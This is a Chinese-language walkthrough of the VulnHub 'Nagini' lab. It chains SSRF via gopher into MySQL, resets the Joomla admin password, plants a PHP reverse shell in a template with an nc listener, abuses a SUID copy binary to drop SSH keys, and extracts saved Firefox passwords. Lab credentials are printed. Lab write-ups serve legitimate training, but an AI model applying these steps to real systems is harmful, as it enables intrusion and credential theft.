哈利波特2
靶场下载链接:https://www.vulnhub.com/entry/harrypotter-nagini,689/
打靶
joomla
namp端口发现80

然后dirsearch


进行joomscan
1 | joomscan -u 172.20.10.2/joomla/ |

发现了.php.bak备份文件
去下载然后发现了数据库的帐号密码,但是远程连接不上去

然后我的思路就被卡住了,看了庆尘哥的WP,他还扫到了note.txt

就是通过http3访问后就可以提示到这个文件internalResourceFeTcher.php
然后就去访问
经过测试发现存在SSRF探测内网资源

SSRF+gopher打RCE
1 | 1.下载 |

1 | #这里需要使用py2的环境 |
然后复制生成的那一串,到网页上去探测(没有出来,就多刷新几次)
在源码中方便找一些

1 | python2 gopherus.py --exploit mysql |

这里发现了帐号密码,但是密码是md5解不开,但是可以跟数据库交互,那么干脆直接改一个md5的密码进去不就行了?
1 | python2 gopherus.py --exploit mysql |

然后就去后台**/joomla/administrator**/登录
1 | site_admin |
反弹shell
因为以前打过红日的靶场跟这个类似,所以直接找到template模块修改,进行反弹shell


这里选择了error.php,把它的全部内容才成了kali中**/usr/share/webshells/php/php-reverse-shell.php**中的内容(注意修改反弹shell的你自己的ip/port)
先在本地开启监听
1 | nc -lvvp 8787 |
然后访问error.php进行触发反弹shell

在网站的根目录下发现了第一个flag

在/home/snape/.creds.txt中进行ba64解密发现了一密码
TG92ZUBsaWxseQ==

猜测就是作者给的当前用户的密码
1 | ssh snape@172.20.10.2 |

cat 第二个flag发现权限不够,因此想着去提权

1 | find / -perm -u=s -type f 2>/dev/null |
发现了一个不同寻常的东西

最终发现这是一个复制文件的脚本
因此就有了思路,复制ssh的公钥进行免密登录
首先在kali中进行ssh-keygen的生成公钥和私钥
然后把id_rsa.pub上传到服务器上/.ssh/下即可
改名为authorized_keys
权限chmod 640 authorized_keys
然后通过./su_cp authorized_keys /home/hermoine/.ssh/
然后就可以免密登录
1 | ssh -i rsa_id hermoine@172.20.10.2 |

cat horcrux2.txt

拿到flag2
最后一个flag肯定在root中
然后在当前用户中发现了**.mozilla**
这里面可以查找一些用户密码
1 | 1.scp -rp hermoine@172.20.10.2:/home/hermoine/.mozilla/firefox /root/demo |

root/@Alohomora#123
